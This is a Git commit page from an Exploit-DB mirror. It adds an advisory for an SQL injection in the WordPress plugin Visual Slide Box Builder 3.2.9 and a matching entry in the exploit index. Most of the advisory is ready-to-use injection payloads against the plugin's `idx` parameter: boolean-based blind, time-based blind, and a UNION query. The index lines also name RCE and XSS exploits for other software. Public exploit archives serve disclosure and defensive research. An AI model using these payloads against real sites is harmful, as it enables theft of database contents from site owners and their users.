bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-07-27

Browse source 
1 changes to exploits/shellcodes

WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi
This commit is contained in:
Offensive Security 2022-07-27 05:01:49 +00:00
parent 46346f8944
commit 7c6e7bc19d
2 changed files with 35 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

34
exploits/php/webapps/50980.txt Normal file
View file

@ -0,0 +1,34 @@
# Title: WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi
# Author: nu11secur1ty
# Date: 07.11.2022
# Vendor: https://wphive.com/
# Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin
## Description:
The parameter `idx` from the Visual Slide Box Builder plugin app for
WordPress appears to be vulnerable to SQLi.
The attacker can receive all database information from the WordPress
database and he can use it for very malicious purposes.
[+] Payloads:
```mysql
---
Parameter: idx (GET)
Type: boolean-based blind
Title: HAVING boolean-based blind - WHERE, GROUP BY clause
Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
HAVING 1854=1854
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL)
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL#
---
```

1
files_exploits.csv
View file

@ -45042,3 +45042,4 @@ id,file,description,date,author,type,platform,port
50976,exploits/php/webapps/50976.txt,"Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Giulio Garzia Ozozuz",webapps,php,
50978,exploits/php/webapps/50978.py,"CodoForum v5.1 - Remote Code Execution (RCE)",1970-01-01,"Krish Pandey",webapps,php,
50979,exploits/multiple/webapps/50979.py,"OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)",1970-01-01,"Thomas Knudsen",webapps,multiple,
50980,exploits/php/webapps/50980.txt,"WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi",1970-01-01,nu11secur1ty,webapps,php,

Can't render this file because it is too large.